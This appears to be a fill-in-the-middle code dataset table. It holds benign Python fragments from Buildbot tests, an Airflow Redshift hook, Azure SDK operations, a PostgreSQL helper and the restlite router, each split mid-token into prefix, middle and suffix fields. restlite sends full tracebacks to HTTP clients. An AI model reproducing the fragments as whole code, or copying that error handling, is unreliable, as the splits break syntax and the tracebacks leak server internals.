repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
anish/buildbot
|
master/buildbot/test/unit/test_reporters_utils.py
|
Python
|
gpl-2.0
| 8,181
| 0.001834
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import textwrap
from twisted.internet import defer
from twisted.trial import unittest
from buildbot.process.results import FAILURE
from buildbot.process.results import RETRY
from buildbot.process.results import SUCCESS
from buildbot.reporters import utils
from buildbot.test import fakedb
from buildbot.test.fake import fakemaster
from buildbot.test.util import logging
from buildbot.test.util.misc import TestReactorMixin
class TestDataUtils(TestReactorMixin, unittest.TestCase, logging.LoggingMixin):
LOGCONTENT = textwrap.dedent("""\
line zero
line 1
""")
def setUp(self):
self.setUpTestReactor()
self.master = fakemaster.make_master(self, wantData=True, wantDb=True,
wantMq=True)
def setupDb(self):
self.db = self.master.db
self.db.insertTestData([
fakedb.Master(id=92),
fakedb.Worker(id=13, name='wrk'),
fakedb.Buildset(id=98, results=SUCCESS, reason="testReason1"),
fakedb.Builder(id=80, name='Builder1'),
fakedb.BuildRequest(id=9, buildsetid=97, builderid=80),
fakedb.BuildRequest(id=10, buildsetid=97, build
|
erid=80),
fakedb.BuildRequest(id=11, buildsetid=98, builderid=80),
fakedb.BuildRequest(id=12, buildsetid=98, builderid=80),
fakedb.Build(id=18, number=0, builderid=80, buildrequestid=9, wo
|
rkerid=13,
masterid=92, results=FAILURE),
fakedb.Build(id=19, number=1, builderid=80, buildrequestid=10, workerid=13,
masterid=92, results=RETRY),
fakedb.Build(id=20, number=2, builderid=80, buildrequestid=11, workerid=13,
masterid=92, results=SUCCESS),
fakedb.Build(id=21, number=3, builderid=80, buildrequestid=12, workerid=13,
masterid=92, results=SUCCESS),
fakedb.BuildsetSourceStamp(buildsetid=98, sourcestampid=234),
fakedb.SourceStamp(id=234),
fakedb.Change(changeid=13, branch='trunk', revision='9283', author='me@foo',
repository='svn://...', codebase='cbsvn',
project='world-domination', sourcestampid=234),
fakedb.Patch(id=99, patch_base64='aGVsbG8sIHdvcmxk',
patch_author='him@foo', patch_comment='foo', subdir='/foo',
patchlevel=3),
fakedb.SourceStamp(id=235, patchid=99),
])
for _id in (20, 21):
self.db.insertTestData([
fakedb.BuildProperty(
buildid=_id, name="workername", value="wrk"),
fakedb.BuildProperty(
buildid=_id, name="reason", value="because"),
fakedb.BuildProperty(
buildid=_id, name="owner", value="him"),
fakedb.Step(id=100 + _id, buildid=_id, name="step1"),
fakedb.Step(id=200 + _id, buildid=_id, name="step2"),
fakedb.Log(id=60 + _id, stepid=100 + _id, name='stdio', slug='stdio', type='s',
num_lines=2),
fakedb.LogChunk(logid=60 + _id, first_line=0, last_line=1, compressed=0,
content=self.LOGCONTENT),
])
@defer.inlineCallbacks
def getChangesForBuild(buildid):
assert buildid == 20
ch = yield self.master.db.changes.getChange(13)
return [ch]
self.master.db.changes.getChangesForBuild = getChangesForBuild
@defer.inlineCallbacks
def test_getDetailsForBuildset(self):
self.setupDb()
res = yield utils.getDetailsForBuildset(self.master, 98, wantProperties=True,
wantSteps=True, wantPreviousBuild=True)
self.assertEqual(len(res['builds']), 2)
build1 = res['builds'][0]
build2 = res['builds'][1]
buildset = res['buildset']
self.assertEqual(build1['properties'], {'reason': ('because', 'fakedb'),
'owner': ('him', 'fakedb'),
'workername': ('wrk', 'fakedb')})
self.assertEqual(len(build1['steps']), 2)
self.assertEqual(build1['buildid'], 20)
self.assertEqual(build2['buildid'], 21)
self.assertEqual(buildset['bsid'], 98)
# make sure prev_build was computed
self.assertEqual(build1['prev_build']['buildid'], 18)
self.assertEqual(build2['prev_build']['buildid'], 20)
@defer.inlineCallbacks
def test_getDetailsForBuildsetWithLogs(self):
self.setupDb()
res = yield utils.getDetailsForBuildset(self.master, 98, wantProperties=True,
wantSteps=True, wantPreviousBuild=True,
wantLogs=True)
build1 = res['builds'][0]
self.assertEqual(
build1['steps'][0]['logs'][0]['content']['content'], self.LOGCONTENT)
@defer.inlineCallbacks
def test_getResponsibleUsers(self):
self.setupDb()
res = yield utils.getResponsibleUsersForSourceStamp(self.master, 234)
self.assertEqual(res, ["me@foo"])
@defer.inlineCallbacks
def test_getResponsibleUsersFromPatch(self):
self.setupDb()
res = yield utils.getResponsibleUsersForSourceStamp(self.master, 235)
self.assertEqual(res, ["him@foo"])
@defer.inlineCallbacks
def test_getResponsibleUsersForBuild(self):
self.setupDb()
res = yield utils.getResponsibleUsersForBuild(self.master, 20)
self.assertEqual(sorted(res), sorted(["me@foo", "him"]))
@defer.inlineCallbacks
def test_getResponsibleUsersForBuildWithBadOwner(self):
self.setUpLogging()
self.setupDb()
self.db.insertTestData([
fakedb.BuildProperty(
buildid=20, name="owner", value=["him"]),
])
res = yield utils.getResponsibleUsersForBuild(self.master, 20)
self.assertLogged("Please report a bug")
self.assertEqual(sorted(res), sorted(["me@foo", "him"]))
@defer.inlineCallbacks
def test_getResponsibleUsersForBuildWithOwners(self):
self.setupDb()
self.db.insertTestData([
fakedb.BuildProperty(
buildid=20, name="owners", value=["him", "her"]),
])
res = yield utils.getResponsibleUsersForBuild(self.master, 20)
self.assertEqual(sorted(res), sorted(["me@foo", "him", "her"]))
@defer.inlineCallbacks
def test_getPreviousBuild(self):
self.setupDb()
build = yield self.master.data.get(("builds", 21))
res = yield utils.getPreviousBuild(self.master, build)
self.assertEqual(res['buildid'], 20)
@defer.inlineCallbacks
def test_getPreviousBuildWithRetry(self):
self.setupDb()
build = yield self.master.data.get(("builds", 20))
res = yield utils.getPreviousBuild(self.master, build)
self.assertEqual(res['buildid'], 18)
class TestURLUtils(TestReactorMixin, unittest.TestCase):
def setUp(self):
self.setUpTestReactor()
self.master = fakemaster.make_master(self)
def test_UrlForBuild(self):
self.assertEqual(utils.getURLForBuild(self.master, 1, 3),
'http://localhost:8080/#builders/1/builds/3')
|
zack3241/incubator-airflow
|
airflow/contrib/hooks/redshift_hook.py
|
Python
|
apache-2.0
| 4,181
| 0.001196
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from airflow.contrib.hooks.aws_hook import AwsHook
class RedshiftHook(AwsHook):
"""
Interact with AWS Redshift, using the boto3 library
"""
def get_conn(self):
return self.get_client_type('redshift')
# TODO: Wrap create_cluster_snapshot
def cluster_status(self, cluster_identifier):
"""
Return status of a cluster
:param cluster_identifier: unique identifier of a cluster
:type cluster_identifier: str
"""
conn = self.get_conn()
try:
response = conn.describe_clusters(
ClusterIdentifier=cluster_identifier)['Clusters']
return response[0]['ClusterStatus'] if response else None
except conn.exceptions.ClusterNotFoundFault:
return 'cluster_not_found'
def delete_cluster(
self,
cluster_identifier,
skip_final_cluster_snapshot=True,
final_cluster_snapshot_identifier=''):
"""
Delete a cluster and optionally create a snapshot
:param cluster_identifier: unique identifier of a cluster
:type cluster_identifier: str
:param skip_final_cluster_snapshot: determines cluster snapshot creation
:type skip_final_cluster_snapshot: bool
:param final_cluster_snapshot_identifier: name of final cluster snapshot
:type final_cluster_snapshot_identifier: str
"""
response = self.get_conn().delete_cluster(
ClusterIdentifier=cluster_identifier,
SkipFinalClusterSnapshot=skip_final_cluster_snapshot,
FinalClusterSnapshotIdentifier=final_cluster_snapshot_identifier
)
return response['Cluster'] if response['Cluster'] else None
def describe_cluster_snapshots(self, cluster_identifier):
"""
Gets a list of snapshots for a cluster
:param cluster_identifier: unique identifier of a cluster
:type cluster_identifier: str
"""
response = self.get_conn().describe_cluster_snapshots(
ClusterIdentifier=cluster_identifier
)
if 'Snapshots' not in response:
return None
snapshots = response['Snapshots']
snapshots = filter(lambda x: x['Status'], snapshots)
snapshots.sort(key=lambda x: x['SnapshotCreateTime'], reverse=True)
return snapshots
def restore_from_cluster_snapshot(self, cluster_identifier, snapshot_identifier):
"""
Restores a cluster from its snapshot
:param cluster_identifier: unique identifier of a cluster
:type cluster_identifier: str
:param snapshot_identifier: unique identifier for a snapshot of a cluster
:type snapshot_identifier: str
"""
response = self.get_conn().restore_from_cluster_snapshot(
ClusterIdentifier=cluster_identifier,
SnapshotIdentifier=snapshot_identifier
)
return response['Cluster'] if response['Clu
|
ster'] else None
def create_cluster_snapshot(self, snapshot_identifier, cluster_identifier):
"""
|
Creates a snapshot of a cluster
:param snapshot_identifier: unique identifier for a snapshot of a cluster
:type snapshot_identifier: str
:param cluster_identifier: unique identifier of a cluster
:type cluster_identifier: str
"""
response = self.get_conn().create_cluster_snapshot(
SnapshotIdentifier=snapshot_identifier,
ClusterIdentifier=cluster_identifier,
)
return response['Snapshot'] if response['Snapshot'] else None
|
STOP2/stop2.0-backend
|
src/db.py
|
Python
|
mit
| 4,799
| 0.004168
|
import asyncio
import time
import psycopg2
import psycopg2.pool
import os
import sys
class Database:
def __init__(self):
loop = asyncio.get_event_loop()
loop.run_until_complete(self.init_connection())
@asyncio.coroutine
def init_connection(self):
result = 1
loop_end = time.time() + 10
while time.time() < loop_end:
try:
self.pool = psycopg2.pool.ThreadedConnectionPool(1, 20, host=os.getenv('DBHOST', 'localhost'),
port=os.getenv('DBPORT', '5432'),
user=os.getenv('DBUSER', 'stop'),
database=os.getenv('DBNAME', 'stop'),
password=os.getenv('DBPASS', 'stop'))
result = 0
break
except:
continue
if result:
print ("Initializing a database connection failed")
sys.exit()
def get_connection(self):
return self.pool.getconn()
def put_connection(self, conn):
self.pool.putconn(conn)
def store_request(self, trip_id, stop_id, device_id, push_notification):
conn = self.get_connection()
cur = conn.cursor()
if device_id == '0':
values = (trip_id, stop_id, device_id, True)
else:
values = (trip_id, stop_id, device_id, not push_notification)
sql = "INSERT INTO request (trip_id, stop_id, user_id, device_id, pushed, req_time, canceled) VALUES (%s, %s, 'user', %s, %s, now(), false) RETURNING id"
cur.execute(sql, values)
request_id = cur.fetchone()[0]
conn.commit()
self.put_connection(conn)
return request_id
def get_request_info(self, request_id):
conn = self.get_connection()
cur = conn.cursor()
values = (request_id,)
sql = "SELECT trip_id, stop_id FROM request WHERE id = %s"
cur.execute(sql, values)
result = cur.fetchone()
self.put_connect
|
ion(conn)
return result
def cancel_request(self, request_id):
conn = self.get_connection()
cur = conn.cursor()
values = (request_id,)
|
sql = "UPDATE request SET canceled = true, cancel_time = now() WHERE id = %s RETURNING trip_id"
cur.execute(sql, values)
trip_id = cur.fetchone()[0]
conn.commit()
self.put_connection(conn)
return trip_id
def get_requests(self, trip_id):
conn = self.get_connection()
cur = conn.cursor()
values = (trip_id,)
sql = "SELECT stop_id FROM request WHERE canceled = false AND trip_id = %s"
cur.execute(sql, values)
result = cur.fetchall()
self.put_connection(conn)
return result
def store_report(self, trip_id, stop_id):
conn = self.get_connection()
cur = conn.cursor()
values = (trip_id, stop_id)
sql = "INSERT INTO report (trip_id, stop_id, user_id, report_time) VALUES (%s, %s, 'user', now())"
cur.execute(sql, values)
conn.commit()
self.put_connection(conn)
def get_unpushed_requests(self):
conn = self.get_connection()
cur = conn.cursor()
sql = "SELECT trip_id,id,stop_id,device_id FROM request WHERE canceled = false AND pushed = false"
cur.execute(sql)
result = cur.fetchall()
self.put_connection(conn)
return result
def set_pushed(self, ids):
conn = self.get_connection()
cur = conn.cursor()
values = (tuple(ids),)
sql = "UPDATE request SET pushed = true WHERE id IN %s"
cur.execute(sql, values)
conn.commit()
self.put_connection(conn)
def add_vehicle(self, vehicle_id, trip_id):
conn = self.get_connection()
cur = conn.cursor()
values = (vehicle_id, trip_id)
sql = "INSERT INTO vehicle (vehicle_id, trip_id) VALUES (%s, %s)"
cur.execute(sql, values)
conn.commit()
self.put_connection(conn)
def remove_vehicle(self, vehicle_id, trip_id):
conn = self.get_connection()
cur = conn.cursor()
values = (vehicle_id, trip_id)
sql = "DELETE FROM vehicle WHERE vehicle_id = %s AND trip_id = %s"
cur.execute(sql, values)
conn.commit()
self.put_connection(conn)
def get_vehicles(self):
conn = self.get_connection()
cur = conn.cursor()
sql = "SELECT trip_id FROM vehicle"
cur.execute(sql)
result = cur.fetchall()
self.put_connection(conn)
return result
|
Azure/azure-sdk-for-python
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/subscriptions/v2018_06_01/aio/operations/_subscriptions_operations.py
|
Python
|
mit
| 12,046
| 0.004649
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._subscriptions_operations import build_check_zone_peers_request, build_get_request, build_list_locations_request, build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class SubscriptionsOperations:
"""SubscriptionsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.resource.subscriptions.v2018_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list_locations(
self,
subscription_id: str,
**kwargs: Any
) -> AsyncIterable["_models.LocationListResult"]:
"""Gets all available geo-locations.
This operation provides all the locations that are available for resource providers; however,
each resource provider may support a subset of this list.
:param subscription_id: The ID of the target subscription.
:type subscription_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either LocationListResult or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.subscriptions.v2018_06_01.models.LocationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.LocationListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_locations_request(
subscription_id=subscription_id,
template_url=self.list_locations.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_locations_request(
subscription_id=subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("LocationListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_locations.metadata = {'url': '/subscriptions/{subscriptionId}/locations'} # type: ignore
@distributed_trace_async
async def get(
self,
subscription_id: str,
**kwargs: Any
) -> "_models.Subscription":
"""Gets details about a specified subscription.
:param subscription_id: The ID of the target subscription.
:type subscription_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Subscription, or the result of cls(response)
:rtype: ~azure.mgmt.resource.subscriptions.v2018_06_01.models.Subscription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Subscription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
subscription_id=subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Subscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}'} # type: ignore
@distributed_trace
def list(
self,
**kwargs: Any
) -> AsyncIterable["_models.SubscriptionListResult"]:
"""Gets all subscriptions for a tenant.
:keyword callable cls: A custom type or function that will b
|
e passed the direct response
|
:return: An iterator like instance of either SubscriptionListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.subscriptions.v2018_06_01.models.SubscriptionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SubscriptionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
template_url=self.list.metadata['url'],
)
request = _convert_request(requ
|
lmazuel/azure-sdk-for-python
|
azure-servicefabric/azure/servicefabric/models/cluster_upgrade_description_object.py
|
Python
|
mit
| 5,840
| 0.00137
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ClusterUpgradeDescriptionObject(Model):
"""Represents a ServiceFabric cluster upgrade.
:param config_version: The cluster configuration version (specified in the
cluster manifest).
:type config_version: str
:param code_version: The ServiceFabric code version of the cluster.
:type code_version: str
:param upgrade_kind: The kind of upgrade out of the following possible
values. Possible values include: 'Invalid', 'Rolling'. Default value:
"Rolling" .
:type upgrade_kind: str or ~azure.servicefabric.models.UpgradeKind
:param rolling_upgrade_mode: The mode used to monitor health during a
rolling upgrade. Possible values include: 'Invalid', 'UnmonitoredAuto',
'UnmonitoredManual', 'Monitored'. Default value: "UnmonitoredAuto" .
:type rolling_upgrade_mode: str or ~azure.servicefabric.models.UpgradeMode
:param upgrade_replica_set_check_timeout_in_seconds: The maximum amount of
time to block processing of an upgrade domain and prevent loss of
availability when there are unexpected issues. When this timeout expires,
processing of the upgrade domain will proceed regardless of availability
loss issues. The timeout is reset at the start of each upgrade domain.
Valid values are between 0 and 42949672925 inclusive. (unsigned 32-bit
integer).
:type upgrade_replica_set_check_timeout_in_seconds: long
:param force_restart: If true, then processes are forcefully restarted
during upgrade even when the code versi
|
on has not changed (the upgrade
only changes configuration or data).
:type force_restart: bool
:param enable_delta_health_evaluation: When true, enables delta health
evaluation rather
|
than absolute health evaluation after completion of each
upgrade domain.
:type enable_delta_health_evaluation: bool
:param monitoring_policy: Describes the parameters for monitoring an
upgrade in Monitored mode.
:type monitoring_policy:
~azure.servicefabric.models.MonitoringPolicyDescription
:param cluster_health_policy: Defines a health policy used to evaluate the
health of the cluster or of a cluster node.
:type cluster_health_policy:
~azure.servicefabric.models.ClusterHealthPolicy
:param cluster_upgrade_health_policy: Defines a health policy used to
evaluate the health of the cluster during a cluster upgrade.
:type cluster_upgrade_health_policy:
~azure.servicefabric.models.ClusterUpgradeHealthPolicyObject
:param application_health_policy_map: Defines a map that contains specific
application health policies for different applications.
Each entry specifies as key the application name and as value an
ApplicationHealthPolicy used to evaluate the application health.
If an application is not specified in the map, the application health
evaluation uses the ApplicationHealthPolicy found in its application
manifest or the default application health policy (if no health policy is
defined in the manifest).
The map is empty by default.
:type application_health_policy_map:
list[~azure.servicefabric.models.ApplicationHealthPolicyMapItem]
"""
_attribute_map = {
'config_version': {'key': 'ConfigVersion', 'type': 'str'},
'code_version': {'key': 'CodeVersion', 'type': 'str'},
'upgrade_kind': {'key': 'UpgradeKind', 'type': 'str'},
'rolling_upgrade_mode': {'key': 'RollingUpgradeMode', 'type': 'str'},
'upgrade_replica_set_check_timeout_in_seconds': {'key': 'UpgradeReplicaSetCheckTimeoutInSeconds', 'type': 'long'},
'force_restart': {'key': 'ForceRestart', 'type': 'bool'},
'enable_delta_health_evaluation': {'key': 'EnableDeltaHealthEvaluation', 'type': 'bool'},
'monitoring_policy': {'key': 'MonitoringPolicy', 'type': 'MonitoringPolicyDescription'},
'cluster_health_policy': {'key': 'ClusterHealthPolicy', 'type': 'ClusterHealthPolicy'},
'cluster_upgrade_health_policy': {'key': 'ClusterUpgradeHealthPolicy', 'type': 'ClusterUpgradeHealthPolicyObject'},
'application_health_policy_map': {'key': 'ApplicationHealthPolicyMap', 'type': '[ApplicationHealthPolicyMapItem]'},
}
def __init__(self, config_version=None, code_version=None, upgrade_kind="Rolling", rolling_upgrade_mode="UnmonitoredAuto", upgrade_replica_set_check_timeout_in_seconds=None, force_restart=None, enable_delta_health_evaluation=None, monitoring_policy=None, cluster_health_policy=None, cluster_upgrade_health_policy=None, application_health_policy_map=None):
super(ClusterUpgradeDescriptionObject, self).__init__()
self.config_version = config_version
self.code_version = code_version
self.upgrade_kind = upgrade_kind
self.rolling_upgrade_mode = rolling_upgrade_mode
self.upgrade_replica_set_check_timeout_in_seconds = upgrade_replica_set_check_timeout_in_seconds
self.force_restart = force_restart
self.enable_delta_health_evaluation = enable_delta_health_evaluation
self.monitoring_policy = monitoring_policy
self.cluster_health_policy = cluster_health_policy
self.cluster_upgrade_health_policy = cluster_upgrade_health_policy
self.application_health_policy_map = application_health_policy_map
|
lbovet/platane
|
restlite.py
|
Python
|
lgpl-3.0
| 29,388
| 0.010617
|
'''
restlite: REST + Python + JSON + XML + SQLite + authentication.
http://code.google.com/p/restlite
Copyright (c) 2009, Kundan Singh, kundan10@gmail.com. All rights reserved.
License: released under LGPL (Lesser GNU Public License).
This light-weight module allows quick prototyping of web services using the RESTful architecture and allows easy
integration with sqlite3 database, and JSON and XML representation format. The approach is to provide all the
appropriate tools which you can use to build your own application, instead of providing a intrusive framework.
Features:
1. Very lightweight module in pure Python and no other dependencies hence ideal for quick prototyping.
2. Two levels of API: one is not intrusive (for low level WSGI) and other is intrusive (for high level @resource).
3. High level API can conveniently use sqlite3 database for resource storage.
4. Common list and tuple-based representation that is converted to JSON and/or XML.
5. Supports pure REST as well as allows browser and Flash Player access (with GET, POST only).
6. Integrates unit testing using doctest module.
7. Handles HTTP cookies and authentication.
Dependencies: Python 2.6.
'''
from wsgiref.util import setup_testing_defaults
from xml.dom import minidom
import re, sys, sqlite3, Cookie, base64, hashlib, time, traceback
try: import json
except: print 'Cannot import json. Please use Python 2.6.'; raise
_debug = False
defaultType = 'application/json' # default content type if ACCEPT is */*. Used in represent and router.
#------------------------------------------------------------------------------
# REST router
#------------------------------------------------------------------------------
def router(routes):
'''This is the main low level REST router function that takes a list of routes and sequentially tries to match the
request method and URL pattern. If a valid route is matched, request transformation is applied. If an application
is specified for a route, then the (wsgiref) application is invoked and the response is returned. This is used
together with wsgiref.make_server to launch a RESTful service.
Your can use the routes to do several things: identify the response type (JSON, XML) from the URL, identify
some parts in the URL as variables available to your application handler, modify some HTTP header or message body
based on the URL, convert a GET or POST URL from the browser with URL suffix of /put or /delete to PUT or DELETE
URL to handle these commands from the browser, etc. For more details see the project web page.
>>> def files_handler(env, start_response):
... return '<files><type>' + env['ACCEPT'] + '</type><file>somefile.txt</file></files>'
>>> routes = [
... (r'GET,PUT,POST /xml/(?P<path>.*)$', 'GET,PUT,POST /%(path)s', 'ACCEPT=text/xml'),
... (r'GET /files$', files_handler) ]
>>> r = router(routes) # create the router using these routes
>>> # and test using the following code
>>> env, start_response = {'REQUEST_METHOD': 'GET', 'PATH_INFO': '/xml/files', 'SCRIPT_NAME': '', 'QUERY_STRING': ''}, lambda x,y: (x, y)
>>> print r(env, start_response)
<files><type>text/xml</type><file>somefile.txt</file></files>
'''
if isinstance(routes, dict) or hasattr(routes, 'items'): routes = routes.iteritems()
def handler(env, start_response):
import logging
setup_testing_defaults(env)
if 'wsgiorg.routing_args' not in env: env['wsgiorg.routing_args'] = dict()
env['COOKIE'] = Cookie.SimpleCookie()
if 'HTTP_COOKIE' in env: env['COOKIE'].load(env['HTTP_COOKIE'])
if not 'QUERY_STRING' in env:
env['QUERY_STRING']= None
for route in routes:
method, pattern = route[0].split(' ', 1)
methods = method.split(',')
if env['REQUEST_METHOD'] not in methods: continue
path = env['PATH_INFO'] + ('?' + env['QUERY_STRING'] if env['QUERY_STRING'] else '')
match = re.match(pattern, path)
if match:
app = None
if callable(route[-1]):
route, app = route[:-1], route[-1] # found the app
if len(route) > 1:
new_methods, path = route[1].split(' ', 1)
env['REQUEST_METHOD'] = new_methods.split(',')[methods.index(env['REQUEST_METHOD'])]
env['PATH_INFO'], ignore, env['QUERY_STRING'] = (path % match.groupdict()).partition('?') #@UnusedVariable
for name, value in [x.split('=', 1) for x in route[2:]]:
env[name] = value % match.groupdict()
env['wsgiorg.routing_args'].update(match.groupdict())
if app is not None:
matching = match.group(0)
env['PATH_INFO'], env['SCRIPT_NAME'] = env['PATH_INFO'][len(matching):], env['SCRIPT_NAME'] + env['PATH_INFO'][:len(matching)]
def my_response(status, headers):
if 'RESPONSE_HEADERS' not in env: env['RESPONSE_STATUS'], env['RESPONSE_HEADERS'] = status, headers
try: response = app(env, my_response)
except Status: response, env['RESPONSE_STATUS'] = None, str(sys.exc_info()[1])
except Exception, e:
logging.getLogger("platane.restlite").error(e)
print traceback.format_exc()
response, env['RESPONSE_STATUS'] = [traceback.format_exc()], '500 Internal Server Error'
if response is None: response = []
headers = env.get('RESPONSE_HEADERS', [('Content-Type', 'text/plain')])
headers.appe
|
nd( ('Accept-Charset', 'utf-8') )
orig = Cookie.SimpleCookie(); cookie = env['COOKIE']
if 'HTTP_COOKIE' in env: orig.lo
|
ad(env['HTTP_COOKIE'])
map(lambda x: cookie.__delitem__(x), [x for x in orig if x in cookie and str(orig[x]) == str(cookie[x])])
if len(cookie): headers.extend([(x[0], x[1].strip()) for x in [str(y).split(':', 1) for y in cookie.itervalues()]])
start_response(env.get('RESPONSE_STATUS', '200 OK'), headers)
if _debug:
if response: print headers, '\n'+str(response)[:256]
if type(response) == str:
return [ response ]
else:
return ""
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['Use one of these URL forms\n ' + '\n '.join(str(x[0]) for x in routes)]
return handler
#------------------------------------------------------------------------------
# Representations: JSON, XML
#------------------------------------------------------------------------------
def tojson(value):
'''The function converts the supplied value to JSON representation. It assumes the unified list format of value.
Typically you just call represent(value, type=request['ACCEPT']) instead of manually invoking this method.
To be consistent with str(obj) function which uses obj.__str__() method if available, tojson() uses obj._json_()
method if available on value. Otherwise it checks obj._list_() method if available to get the unified list format.
Otherwise it assumes that the value is in unified list format. The _json_ and _list_ semantics allow you to
customize the JSON representation of your object, if needed.
>>> value = ('file', (('name', 'myfile.txt'), ('acl', [('allow', 'kundan'), ('allow', 'admin')])))
>>> tojson(value)
'{"file": {"name": "myfile.txt", "acl": [{"allow": "kundan"}, {"allow": "admin"}]}}'
'''
def list2dict(value):
if hasattr(value, '_json_') and callable(value._json_): return value._json_()
if hasattr(value, '_list_') and callable(value._list_): val
|
a2ron44/alfredHomeAutomation
|
alfredPHP/controller.py
|
Python
|
gpl-3.0
| 539
| 0.012987
|
import smbus, sys
import time
bus = smbus.SMBus(1)
# i2c address
address =
|
0x04
if len(sys.argv) < 3:
print -1
sys.exit()
cmd = sys.argv[1]
msg = sys.argv[2]
msAr = []
for x in msg:
msAr.append(ord(x))
def writeNumber():
#bus.write_byte(address, value)
bus.write_i2c_block_data(address,ord(cmd), msAr)
return -1
def readNumber():
number = bus.read_byte(address)
# number = bus.read_byte_data(address, 1)
return number
writeNumber()
# sleep one second
time.sleep(1)
res = re
|
adNumber()
print res
|
hugovk/terroroftinytown
|
terroroftinytown/tracker/database.py
|
Python
|
mit
| 992
| 0
|
# encoding=utf-8
import sqlalchemy
from sqlalchemy.engine import create_engine
from sqlalchemy.pool import SingletonThreadPool
from terroroftinytown.tracker.model import Session, Base
class Database(object):
def __init__(self, path, delete_everything=False):
if path.startswith('sqlite:'):
self.engine = create_engine(path, poolclass=SingletonThreadPool)
sqlalchemy.event.listen(
self.engine, 'connect', self._apply_pragmas_callback)
else:
self.engine = create_engine(path)
